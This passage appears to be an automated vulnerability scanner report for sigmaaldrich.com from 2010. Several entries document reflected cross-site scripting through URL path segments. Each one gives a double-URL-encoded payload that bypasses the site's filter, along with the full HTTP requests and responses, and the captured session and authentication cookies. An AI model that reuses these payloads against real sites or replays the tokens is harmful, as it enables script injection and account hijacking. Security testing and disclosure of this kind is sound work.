bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:30 GMT
Content-Length: 28971
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/content/sigma-aldrich/the-americas/united-states/promotional-offersf2605";alert(1)//d1711f2b49f","E404") ;
   </script>
...[SNIP]...

1.247. http://www.sigmaaldrich.com/customer-service/services.flagdisplay.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.flagdisplay.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eb43%2522%253balert%25281%2529%252f%252fdb39faf8c5b was submitted in the REST URL parameter 1. This input was echoed as 8eb43";alert(1)//db39faf8c5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service8eb43%2522%253balert%25281%2529%252f%252fdb39faf8c5b/services.flagdisplay.js?id=1289930503318 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:13 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28944


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service8eb43";alert(1)//db39faf8c5b/services.flagdisplay.js","E404") ;
   </script>
...[SNIP]...

1.248. http://www.sigmaaldrich.com/customer-service/services.flagdisplay.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.flagdisplay.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0cc1%2522%253balert%25281%2529%252f%252f188bdb78de2 was submitted in the REST URL parameter 2. This input was echoed as a0cc1";alert(1)//188bdb78de2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service/a0cc1%2522%253balert%25281%2529%252f%252f188bdb78de2?id=1289930503318 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/customer-service/services.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:15 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service/a0cc1";alert(1)//188bdb78de2","E404") ;
   </script>
...[SNIP]...

1.249. http://www.sigmaaldrich.com/customer-service/services.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c170%2522%253balert%25281%2529%252f%252fe8f57a7fc7e was submitted in the REST URL parameter 1. This input was echoed as 2c170";alert(1)//e8f57a7fc7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service2c170%2522%253balert%25281%2529%252f%252fe8f57a7fc7e/services.html HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:07 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28934


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service2c170";alert(1)//e8f57a7fc7e/services.html","E404") ;
   </script>
...[SNIP]...

1.250. http://www.sigmaaldrich.com/customer-service/services.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /customer-service/services.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8308b%2522%253balert%25281%2529%252f%252f74207fc45bc was submitted in the REST URL parameter 2. This input was echoed as 8308b";alert(1)//74207fc45bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /customer-service/8308b%2522%253balert%25281%2529%252f%252f74207fc45bc HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.sigmaaldrich.com/technical-service-home/product-catalog.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive
Cookie: cmTPSet=Y; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; SialLocaleDef=CountryCode~US|WebLang~-1|; country=USA; cmRS=&t1=1289930591823&t2=1289930592337&t3=1289930594943&t4=1289930591682&lti=1289930594943&ln=&hr=/customer-service/services.html&fti=&fn=SearchForm%3A0%3Bemailfriend%3A1%3B&ac=&fd=&uer=&fu=&pi=/technical-service-home/product-catalog.html&ho=cm.sigmaaldrich.com/eluminate%3F&ci=90142934; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"Unknown","MemberId":"Unknown","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":4,"to":2.7,"c":"http://www.sigmaaldrich.com/technical-service-home/product-catalog.html","lc":{"d0":{"v":4,"s":false}},"cd":0,"sd":0,"f":1289930591682}; bn_u=6923287736776754713; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcatalog%2FLookup.do%3FD7%3D0%26N17%3D2%26N16%3DAND(OR(CONTEXT%3A1%2CCONTEXT%3A3)%2COR(LOCATION%3AUS%2CLOCATION%3A0))%26N3%3Dmode%20matchpartialmax%26N5%3DMolecular%20Formula%26N4%3D%60%26N1%3DS_ID%26ST%3DRS%26QS%3DON%26N25%3D0%26F%3DTD%22%2C%22t%22%3A1289930594958%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22l%22%3A%22Services%22%2C%22de%22%3A%7B%22ti%22%3A%22Sigma%20Aldrich%20Product%20Directory%20Home%22%2C%22nw%22%3A310%2C%22nl%22%3A143%7D%7D

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:09 GMT
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/
Content-Length: 28921


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/customer-service/8308b";alert(1)//74207fc45bc","E404") ;
   </script>
...[SNIP]...

1.251. http://www.sigmaaldrich.com/etc/controller/controller-page.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/controller/controller-page.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9ffb%2522%253balert%25281%2529%252f%252f5c05ca51e02 was submitted in the REST URL parameter 1. This input was echoed as b9ffb";alert(1)//5c05ca51e02 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etcb9ffb%2522%253balert%25281%2529%252f%252f5c05ca51e02/controller/controller-page.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:46 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcb9ffb";alert(1)//5c05ca51e02/controller/controller-page.html","E404") ;
   </script>
...[SNIP]...

1.252. http://www.sigmaaldrich.com/etc/controller/controller-page.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/controller/controller-page.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6716%2522%253balert%25281%2529%252f%252f9969eaadf91 was submitted in the REST URL parameter 2. This input was echoed as a6716";alert(1)//9969eaadf91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/controllera6716%2522%253balert%25281%2529%252f%252f9969eaadf91/controller-page.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
